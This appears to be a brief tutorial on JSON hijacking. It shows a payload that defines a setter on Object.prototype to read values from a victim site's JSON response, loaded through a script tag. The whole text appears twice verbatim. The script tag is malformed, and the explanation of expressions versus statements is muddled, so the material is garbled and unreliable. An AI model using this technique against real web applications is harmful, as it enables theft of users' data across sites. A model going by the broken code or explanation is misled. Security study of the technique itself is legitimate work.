A web application is sending data in this format:
{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}
this is a valid JSON, before moving on lets understand an important concept:
1. Javscript expression
2. javascript statement
javscript expressions are not executed by javascript parser, but statements are:
for ex:
{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}
this will not be executed, that is, objects won't be created. The above example is for a javascript expression.
But now when it is converted into a statement as given below:
[{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}]
this gets executed.
The way to exploit this is by declaring a setter for one of the objects, for ex. "t":
Object.prototype.__defineSetter__("t",function(obj){alert(1);for(var i in obj) {alert(i + '=' + obj[i]);} });
<script> defer="defer" src="http://XXX.XXX.XXX.X/main"/> // this points to the json
Until now there is no known way of exploiting a java expression based JSON.
Another restriction on JSON based exploitation is that not many browsers support setters (__defineSetter__).
{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}
this is a valid JSON, before moving on lets understand an important concept:
1. Javscript expression
2. javascript statement
javscript expressions are not executed by javascript parser, but statements are:
for ex:
{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}
this will not be executed, that is, objects won't be created. The above example is for a javascript expression.
But now when it is converted into a statement as given below:
[{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}]
this gets executed.
The way to exploit this is by declaring a setter for one of the objects, for ex. "t":
Object.prototype.__defineSetter__("t",function(obj){alert(1);for(var i in obj) {alert(i + '=' + obj[i]);} });
<script> defer="defer" src="http://XXX.XXX.XXX.X/main"/> // this points to the json
Until now there is no known way of exploiting a java expression based JSON.
Another restriction on JSON based exploitation is that not many browsers support setters (__defineSetter__).